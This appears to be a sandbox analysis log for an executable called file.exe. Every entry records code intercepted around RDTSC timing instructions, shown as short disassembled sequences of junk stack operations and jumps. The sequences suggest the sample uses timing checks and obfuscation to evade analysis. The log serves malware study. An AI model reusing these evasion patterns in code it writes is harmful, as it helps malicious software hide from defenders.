Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7289C4 second address: 7289C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 728C02 second address: 728C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FD0F8CDABE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7299DD second address: 7299E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7299E6 second address: 7299F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7299F7 second address: 729A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B808 second address: 72B882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b add dword ptr [ebp+122D2DF6h], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD0F8CDABE8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D2159h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FD0F8CDABE8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov edi, ebx 0x00000051 mov edi, dword ptr [ebp+122D21FBh] 0x00000057 or dword ptr [ebp+122D380Eh], edi 0x0000005d xchg eax, esi 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 ja 00007FD0F8CDABE6h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B882 second address: 72B897 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jbe 00007FD0F8E1A7C3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D7E6 second address: 72D7EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72CAA7 second address: 72CAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD0F8E1A7A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72BAB5 second address: 72BAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 731A75 second address: 731A9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD0F8E1A7B0h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD0F8E1A7ADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 731A9C second address: 731AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+1245F5DAh], edx 0x00000010 push 00000000h 0x00000012 sbb di, EC51h 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+1245F5DAh], ecx 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 push ebx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop ebx 0x00000025 push eax 0x00000026 jg 00007FD0F8CDABE6h 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD0F8CDABF4h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 731AEE second address: 731AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72EA97 second address: 72EA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 735765 second address: 73576C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 739B50 second address: 739B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD0F8CDABE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 739B5F second address: 739B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73941B second address: 739429 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 739429 second address: 73943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnc 00007FD0F8E1A7A6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73943E second address: 73944B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73944B second address: 739451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7395BE second address: 7395C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7395C2 second address: 7395E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FD0F8E1A7AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D4722 second address: 6D473C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FD0F8CDABE6h 0x0000000f jmp 00007FD0F8CDABEBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F57B second address: 73F5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 ja 00007FD0F8E1A7B4h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FD0F8E1A7A6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F5A2 second address: 73F5DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jo 00007FD0F8CDABE6h 0x00000010 pop ebx 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 push eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jc 00007FD0F8CDABE8h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F72C second address: 73F732 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F732 second address: 73F757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b je 00007FD0F8CDAC0Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F757 second address: 73F75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F75B second address: 73F787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jo 00007FD0F8CDABE6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F787 second address: 73F78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F88E second address: 73F893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F893 second address: 73F908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FD0F8E1A7A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007FD0F8E1A7B9h 0x00000015 jmp 00007FD0F8E1A7B3h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jg 00007FD0F8E1A7C4h 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007FD0F8E1A7B5h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jl 00007FD0F8E1A7ACh 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F908 second address: 73F90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73F90C second address: 73F926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0F8E1A7B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74605C second address: 7460AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABF4h 0x0000000f popad 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD0F8CDABF8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7460AE second address: 7460BA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8E1A7A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744BED second address: 744BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744BF3 second address: 744C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744C03 second address: 744C2E instructions: 0x00000000 rdtsc 0x00000002 je 00007FD0F8CDABF2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FD0F8CDABE6h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744C2E second address: 744C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8E1A7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7454F1 second address: 7454FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7457F7 second address: 74581A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007FD0F8E1A7BAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74581A second address: 745824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0F8CDABE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745986 second address: 74598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74598A second address: 7459B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 jmp 00007FD0F8CDABF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459B4 second address: 7459B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459B8 second address: 7459BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459BE second address: 7459C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459C4 second address: 7459E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD0F8CDABE6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD0F8CDABF3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459E7 second address: 7459EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459EB second address: 7459FD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7459FD second address: 745A15 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FD0F8E1A7AEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745A15 second address: 745A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745A34 second address: 745A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745D0D second address: 745D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745E5F second address: 745E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745E63 second address: 745E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jnp 00007FD0F8CDABE6h 0x00000013 ja 00007FD0F8CDABE6h 0x00000019 pop edi 0x0000001a jmp 00007FD0F8CDABF4h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CA35D second address: 6CA361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71FEDA second address: 700043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jnp 00007FD0F8CDABF4h 0x0000000c jmp 00007FD0F8CDABEEh 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D2AA3h] 0x00000018 call dword ptr [ebp+122D2DE6h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD0F8CDABF1h 0x00000025 push esi 0x00000026 push edx 0x00000027 pop edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72001B second address: 720036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720036 second address: 720048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a ja 00007FD0F8CDABECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720409 second address: 720447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 72EF5572h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FD0F8E1A7A8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call 00007FD0F8E1A7A9h 0x0000002e push eax 0x0000002f push edx 0x00000030 push ecx 0x00000031 ja 00007FD0F8E1A7A6h 0x00000037 pop ecx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 720447 second address: 72048F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FD0F8CDABEAh 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jns 00007FD0F8CDABEAh 0x0000001e mov eax, dword ptr [eax] 0x00000020 jl 00007FD0F8CDABF2h 0x00000026 jc 00007FD0F8CDABECh 0x0000002c jno 00007FD0F8CDABE6h 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 jnl 00007FD0F8CDABE6h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72051B second address: 72051F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72051F second address: 720528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7208D6 second address: 7208DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7208DC second address: 7208E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 721112 second address: 721117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 721117 second address: 721168 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007FD0F8CDABEEh 0x0000000f nop 0x00000010 jl 00007FD0F8CDABEAh 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a lea eax, dword ptr [ebp+12494C5Fh] 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FD0F8CDABE8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a sub edx, 29D034AEh 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 push eax 0x00000045 pop eax 0x00000046 pop ebx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 721168 second address: 700B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8E1A7ABh 0x0000000f nop 0x00000010 add ecx, 72B01255h 0x00000016 mov edx, dword ptr [ebp+122D2DAAh] 0x0000001c call dword ptr [ebp+1245BD22h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FD0F8E1A7AAh 0x0000002c jng 00007FD0F8E1A7A6h 0x00000032 push esi 0x00000033 pop esi 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2B8C second address: 6D2B91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2B91 second address: 6D2B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2B9C second address: 6D2BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2BA0 second address: 6D2BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FD0F8E1A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8E1A7B0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D2BC0 second address: 6D2BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749734 second address: 749741 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749741 second address: 749760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007FD0F8CDABF0h 0x0000000c jnp 00007FD0F8CDABECh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749895 second address: 7498AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749BBC second address: 749BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749BD7 second address: 749BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749BDB second address: 749BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 749EDB second address: 749EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74A195 second address: 74A19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
